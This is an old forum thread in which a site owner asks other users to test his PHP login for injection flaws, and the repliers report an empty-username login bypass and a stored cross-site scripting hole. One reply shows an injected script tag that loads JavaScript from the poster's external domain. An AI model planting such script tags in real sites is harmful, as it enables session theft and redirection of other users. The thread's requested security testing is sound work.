marklarah Posted January 17, 2008 Share Posted January 17, 2008 First, Id like to thank you all for helping me get the rest of this site up Anyway, im pretty sure my login is vulnerable, can you test it (mysql injections and such) i have a test user on my site which you can use, but basically I want you to try and use a mysql injection to get in, and then let me know how so I can protect it http://tls-3.977mb.com/login.php The test username is: olive The password is also olive incase you wan't to see how to logon. Thanks. Ill post the source if need be Link to comment Share on other sites More sharing options...
p2grace Posted January 17, 2008 Share Posted January 17, 2008 This should probably be moved to the "Beta Test Your Stuff" topic. Link to comment Share on other sites More sharing options...
alecks Posted January 17, 2008 Share Posted January 17, 2008 well first off you can simply log in as '', no username or password Link to comment Share on other sites More sharing options...
marklarah Posted January 17, 2008 Author Share Posted January 17, 2008 so how do i protect against this? Link to comment Share on other sites More sharing options...
p2grace Posted January 17, 2008 Share Posted January 17, 2008 In your function that validates the username/password have it check if the inputs are blank. If they are return an error. Link to comment Share on other sites More sharing options...
marklarah Posted January 17, 2008 Author Share Posted January 17, 2008 okay, done, but what about injections and such? Link to comment Share on other sites More sharing options...
helraizer Posted January 17, 2008 Share Posted January 17, 2008 If you register with the username as code there is a very big security threat http://tls-3.977mb.com/login.php Link to comment Share on other sites More sharing options...
helraizer Posted January 17, 2008 Share Posted January 17, 2008 Now in your source has Logged in as: <script src=http://www.helraizer.co.uk/xss1.js></script> (10) So you could be alright, it only diverts for me; I'm not sure, because now I can't log out Link to comment Share on other sites More sharing options...
Recommended Posts